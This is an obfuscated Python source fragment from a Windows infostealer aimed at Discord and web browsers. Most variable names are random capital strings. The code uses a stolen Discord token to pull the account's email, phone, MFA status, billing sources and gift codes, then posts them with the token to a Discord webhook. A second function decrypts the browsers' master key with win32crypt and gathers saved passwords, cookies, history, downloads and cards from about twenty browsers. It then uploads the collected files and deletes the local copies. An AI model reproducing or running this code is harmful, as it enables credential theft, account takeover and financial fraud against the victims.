            AKIAKYIMFLKBRDGXBJWWJRBCATBKPTPAWVETSBBTAQPMPFGMCWPMGAEACOWFAAJMKFIGMBICBHS = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('global_name', "None")
            RCPYWEXYFUSCOVDEJNBDPNEBSLXFOOVTEKNUKWNGANANIHVMMZJJEXOMCVHOTMMN = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('id', "None")
            DIKMFSQGYYXFTNUPNWAFPXBANPLJBPBYXHDBGVYNUJUACAWLEFUOQFTDGX = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('email', "None")
            GDGWSIILBVZAFBUYFZESSLPSZQQIFZFUUAZRBGAPOUNODPMFACQMUQPZTKYBJCVYGLN = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('verified', "None")
            ZLPZFEWTXAZREGXZPRQAQXUDNLXHGHVPKSGWVUPPFOIWNJBKRLUWUPFYSKDQDMZARPJSMQFUGA = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('phone', "None")
            BNGLMQDLNCTERLUIGSFTFMDOGIRGKLIETDNEKOKKPNIQWIMCPTRQI = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('locale', "None")
            OSYASZMOONGPIRVHDFHALSSIRDGFXKQFRCHNPQGPTGEXTJHDMYXSKHWTPOX = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('mfa_enabled', "None")

            try:
                if PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('premium_type', 'None') == 0:
                    OPVYGIEGZFZPETMYCUAHOUSUSSBATIIIRGSEYHXFFOGDCIKAWLSYJQWINGOCLFUGOOETXPKWWPFVLHSLOTLIUYH = 'False'
                elif PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('premium_type', 'None') == 1:
                    OPVYGIEGZFZPETMYCUAHOUSUSSBATIIIRGSEYHXFFOGDCIKAWLSYJQWINGOCLFUGOOETXPKWWPFVLHSLOTLIUYH = 'Nitro Classic'
                elif PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('premium_type', 'None') == 2:
                    OPVYGIEGZFZPETMYCUAHOUSUSSBATIIIRGSEYHXFFOGDCIKAWLSYJQWINGOCLFUGOOETXPKWWPFVLHSLOTLIUYH = 'Nitro Boosts'
                elif PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('premium_type', 'None') == 3:
                    OPVYGIEGZFZPETMYCUAHOUSUSSBATIIIRGSEYHXFFOGDCIKAWLSYJQWINGOCLFUGOOETXPKWWPFVLHSLOTLIUYH = 'Nitro Basic'
                else:
                    OPVYGIEGZFZPETMYCUAHOUSUSSBATIIIRGSEYHXFFOGDCIKAWLSYJQWINGOCLFUGOOETXPKWWPFVLHSLOTLIUYH = 'False'
            except:
                OPVYGIEGZFZPETMYCUAHOUSUSSBATIIIRGSEYHXFFOGDCIKAWLSYJQWINGOCLFUGOOETXPKWWPFVLHSLOTLIUYH = "None"

            try: 
                HEUSJWGUDLOTRZCXVZBGBTUVANPGPKXOSZSIGYSUNGETSQOKTODUUZRITPOSBWYSNJYSEMRUXZWGFIZKSF = f"https://cdn.discordapp.com/avatars/{RCPYWEXYFUSCOVDEJNBDPNEBSLXFOOVTEKNUKWNGANANIHVMMZJJEXOMCVHOTMMN}/{PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{RCPYWEXYFUSCOVDEJNBDPNEBSLXFOOVTEKNUKWNGANANIHVMMZJJEXOMCVHOTMMN}/{PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{RCPYWEXYFUSCOVDEJNBDPNEBSLXFOOVTEKNUKWNGANANIHVMMZJJEXOMCVHOTMMN}/{PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP['avatar']}.png"
            except: 
                HEUSJWGUDLOTRZCXVZBGBTUVANPGPKXOSZSIGYSUNGETSQOKTODUUZRITPOSBWYSNJYSEMRUXZWGFIZKSF = BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW

            try:
                XMHLAQAJIMSXGZLLDZJHQENBSMJIOYPKYQAUYEBZZCXRJRNJHMKLJX = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU_d15c0rd}).json()
                if XMHLAQAJIMSXGZLLDZJHQENBSMJIOYPKYQAUYEBZZCXRJRNJHMKLJX:
                    YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP = []

                    for v4r_method in XMHLAQAJIMSXGZLLDZJHQENBSMJIOYPKYQAUYEBZZCXRJRNJHMKLJX:
                        if v4r_method['type'] == 1:
                            YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP.append('CB')
                        elif v4r_method['type'] == 2:
                            YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP.append("Paypal")
                        else:
                            YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP.append('Other')
                    YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP = ' / '.join(YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP)
                else:
                    YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP = "None"
            except:
                YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP = "None"

            try:
                RWATOEKCPHCXFESHKXOSFMCFUTQKZNOAWREYECXBNFVYOVJZCSJQTMOOGTNSSLNUZSL = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU_d15c0rd}).json()
                if RWATOEKCPHCXFESHKXOSFMCFUTQKZNOAWREYECXBNFVYOVJZCSJQTMOOGTNSSLNUZSL:
                    MOTWLQYSASOPLADLZVEMXEEEPJGZYHVAWBQRDKEUTJFLVOQMGJVLEOGNDWTDOAPRJU = []
                    for BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC in RWATOEKCPHCXFESHKXOSFMCFUTQKZNOAWREYECXBNFVYOVJZCSJQTMOOGTNSSLNUZSL:
                        IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS = BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC['promotion']['outbound_title']
                        BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC = BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC['code']
                        IVSVONYHPRDJOZCMDLJHXSYWPQECFVZPUVWKBSMIAJMFNLYYCMDLBRUSWELHQDSATBJBEJOAFWTXBQDUMKEWONROLSHYNHJLIASE = f"Gift: {IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS}\nCode: {BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC}"
                        if len('\n\n'.join(BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC)) + len(IVSVONYHPRDJOZCMDLJHXSYWPQECFVZPUVWKBSMIAJMFNLYYCMDLBRUSWELHQDSATBJBEJOAFWTXBQDUMKEWONROLSHYNHJLIASE) >= 1024:
                            break
                        MOTWLQYSASOPLADLZVEMXEEEPJGZYHVAWBQRDKEUTJFLVOQMGJVLEOGNDWTDOAPRJU.append(IVSVONYHPRDJOZCMDLJHXSYWPQECFVZPUVWKBSMIAJMFNLYYCMDLBRUSWELHQDSATBJBEJOAFWTXBQDUMKEWONROLSHYNHJLIASE)
                    if len(MOTWLQYSASOPLADLZVEMXEEEPJGZYHVAWBQRDKEUTJFLVOQMGJVLEOGNDWTDOAPRJU) > 0:
                        BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC = '\n\n'.join(MOTWLQYSASOPLADLZVEMXEEEPJGZYHVAWBQRDKEUTJFLVOQMGJVLEOGNDWTDOAPRJU)
                    else:
                        BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC = "None"
                else:
                    BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC = "None"
            except:
                BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC = "None"
        
            v4r_software_name, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT = VAVFAHCIRCASTMIVBYEZKQBCRGIIHTQVPCPONOHPFNKXYGRVFILOHCZGOXOIAHGRFFSDXSZFITKNHHOOSSBUIUTH.get(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU_d15c0rd, ("Unknown Software", "Unknown location"))

            embed = Embed(title=f'Discord Token `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:', color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR)      
            embed.add_field(name=":file_folder: Path:", value=f"```{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}```", inline=True)
            embed.add_field(name=":globe_with_meridians: Token:", value=f"```{LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU_d15c0rd}```", inline=True)
            embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{WDKZZMKOCDFYVBRYKRISJDUHBLWOZYIEHFPECTNPCHRZTZXJUQMHL}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{AKIAKYIMFLKBRDGXBJWWJRBCATBKPTPAWVETSBBTAQPMPFGMCWPMGAEACOWFAAJMKFIGMBICBHS}```", inline=True)
            embed.add_field(name=":robot: Id:", value=f"```{RCPYWEXYFUSCOVDEJNBDPNEBSLXFOOVTEKNUKWNGANANIHVMMZJJEXOMCVHOTMMN}```", inline=True)
            embed.add_field(name=":e_mail: Email:", value=f"```{DIKMFSQGYYXFTNUPNWAFPXBANPLJBPBYXHDBGVYNUJUACAWLEFUOQFTDGX}```", inline=True)
            embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{GDGWSIILBVZAFBUYFZESSLPSZQQIFZFUUAZRBGAPOUNODPMFACQMUQPZTKYBJCVYGLN}```", inline=True)
            embed.add_field(name=":telephone_receiver: Phone:", value=f"```{ZLPZFEWTXAZREGXZPRQAQXUDNLXHGHVPKSGWVUPPFOIWNJBKRLUWUPFYSKDQDMZARPJSMQFUGA}```", inline=True)   
            embed.add_field(name=":rocket: Nitro:", value=f"```{OPVYGIEGZFZPETMYCUAHOUSUSSBATIIIRGSEYHXFFOGDCIKAWLSYJQWINGOCLFUGOOETXPKWWPFVLHSLOTLIUYH}```", inline=True)
            embed.add_field(name=":earth_africa: Language:", value=f"```{BNGLMQDLNCTERLUIGSFTFMDOGIRGKLIETDNEKOKKPNIQWIMCPTRQI}```", inline=True)
            embed.add_field(name=":moneybag: Billing:", value=f"```{YMUJRVRDGDWURHPMLYZBVFGFIYTTTKUHSIJOJFJLLGMUEWQUFUOWHEYJPYBJZVVAP}```", inline=True)
            embed.add_field(name=":gift: Gift Code:", value=f"```{BAKGCSIBJCGFSPWLPZREAOWDJJMUTFXBLHNKBQLGGVPMPDMTCYVKNTJZETLXPTVGBC}```", inline=True)
            embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{OSYASZMOONGPIRVHDFHALSSIRDGFXKQFRCHNPQGPTGEXTJHDMYXSKHWTPOX}```", inline=True)
            embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
            embed.set_image(url=HEUSJWGUDLOTRZCXVZBGBTUVANPGPKXOSZSIGYSUNGETSQOKTODUUZRITPOSBWYSNJYSEMRUXZWGFIZKSF)
            embed.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
            OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(embed=embed, username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)

    upload_t0k3n5()

def Br0w53r_5t341():
    import os
    import shutil
    import json
    import base64
    import sqlite3
    import win32crypt
    from zipfile import ZipFile
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    from discord import SyncWebhook, Embed, File
    from pathlib import Path

    FMKTLLXYDRXDAAUTOQYCTPUCNAEEEDGYGOLNEEOHLGOPCSNPUUQBKMBZOQHSVXDZJWHVDSASYQLPMNQGFYTJDD = []
    VJXQGCSWDXDLFQOZNMRUSFEHVQXFXQSLHCYMYYLDFGDOKUUVACQPNEKARURDDAAZGFTDUXXOS = []
    NQAPOFZCTFPMBSJFNXRWVBQBMQKMRPSNZKBFXJWCQHJSQYVNWYOSRLFEYK = []
    VJWECHRJPICCQDEBBUOQQHOOHYBXUWPDYPQUOEGFOEMQZKDAESHIU = []
    FQKAGXXFGLZFYVUIFCJUNXOMRWRRZSESQBADEYUXMOZPTLOOCJJ = []
    LBGCJPWQBZTLEKWRMSTVXRLABQICZWLWQLYIRPPFCAXSYXQUZGJWZRUJCCOUIMVCPQEZNPXDHURHRFPKHCNWAX = []

    def Br0ws53r_Main():
        RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD = os.getenv('LOCALAPPDATA')
        GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX = os.getenv('APPDATA')
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)
            

        MDSJACWCVFFHCDBZOOJOPOUKYJWBVAUMDDCWYIMXGIXMRPMFPWOFUC = {
            'Google Chrome': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Google', 'Chrome', 'User Data'),
            'Microsoft Edge': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Microsoft', 'Edge', 'User Data'),
            'Opera': os.path.join(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX, 'Opera Software', 'Opera Stable'),
            'Opera GX': os.path.join(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX, 'Opera Software', 'Opera GX Stable'),
            'Brave': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'BraveSoftware', 'Brave-Browser', 'User Data'),
            'Vivaldi': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Vivaldi', 'User Data'),
            'Internet Explorer': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Microsoft', 'Internet Explorer'),
            'Amigo': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Amigo', 'User Data'),
            'Torch': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Torch', 'User Data'),
            'Kometa': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Kometa', 'User Data'),
            'Orbitum': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Orbitum', 'User Data'),
            'Cent Browser': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'CentBrowser', 'User Data'),
            '7Star': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, '7Star', '7Star', 'User Data'),
            'Sputnik': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Sputnik', 'Sputnik', 'User Data'),
            'Vivaldi': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Vivaldi', 'User Data'),
            'Google Chrome SxS': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Google', 'Chrome SxS', 'User Data'),
            'Epic Privacy Browser': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Epic Privacy Browser', 'User Data'),
            'Uran': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'uCozMedia', 'Uran', 'User Data'),
            'Yandex': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Yandex', 'YandexBrowser', 'User Data'),
            'Iridium': os.path.join(RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD, 'Iridium', 'User Data'),
            'Mozilla Firefox': os.path.join(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX, 'Mozilla', 'Firefox', 'Profiles'),
            'Safari': os.path.join(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX, 'Apple Computer', 'Safari'),
        }

        UJJVXCVXZBOKAWWQPCMDNNNQNHCOHXYVFTDDEZYBYPZESSSQHKGNNZZJUYSYGASPAXGKVEKADIZ = [
            '', 'Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'
        ]

        for QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT in MDSJACWCVFFHCDBZOOJOPOUKYJWBVAUMDDCWYIMXGIXMRPMFPWOFUC.items():
            if not os.path.exists(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
                continue

            ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM = get_master_key(os.path.join(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, 'Local State'))
            if not ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM:
                continue

            for v4r_profile in UJJVXCVXZBOKAWWQPCMDNNNQNHCOHXYVFTDDEZYBYPZESSSQHKGNNZZJUYSYGASPAXGKVEKADIZ:
                KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF = os.path.join(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, v4r_profile)
                if not os.path.exists(KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF):
                    continue

                get_passwords(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM)
                get_cookies(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM)
                get_history(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF)
                get_downloads(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF)
                get_cards(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, KJAIEATQNERFBPHJYVSEHYIAKZXVPMWSDOTQUKLTQGTZDLSJPAKJPRFLVFNWUZMIDDUDNZZGBPTDIJMVDLYKYF, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM)

                if QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD not in LBGCJPWQBZTLEKWRMSTVXRLABQICZWLWQLYIRPPFCAXSYXQUZGJWZRUJCCOUIMVCPQEZNPXDHURHRFPKHCNWAX:
                    LBGCJPWQBZTLEKWRMSTVXRLABQICZWLWQLYIRPPFCAXSYXQUZGJWZRUJCCOUIMVCPQEZNPXDHURHRFPKHCNWAX.append(QVMYFHDSUMKNWWCQSWEKKXHIEODOLVYIEYCXKENDHTJVPGOIOOQTQKHNPYIWBXZCLLMBDZNFUTOXRMJULYSGD)

        write_files(IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM)
        send_files(IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM, OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ)
        clean_files(IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM)

    def get_master_key(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
        if not os.path.exists(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
            return None

        try:
            with open(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, 'r', encoding='utf-8') as v4r_f:
                v4r_local_state = json.load(v4r_f)

            WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_key = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
            ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM = win32crypt.CryptUnprotectData(WLRIXJOAUSWWJIFHEOZHTLTGKPTEKKXFDZXIVXDCINDYFKGAQVZZCLJVCWU_key, None, None, None, 0)[1]
            return ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM
        except:
            return None

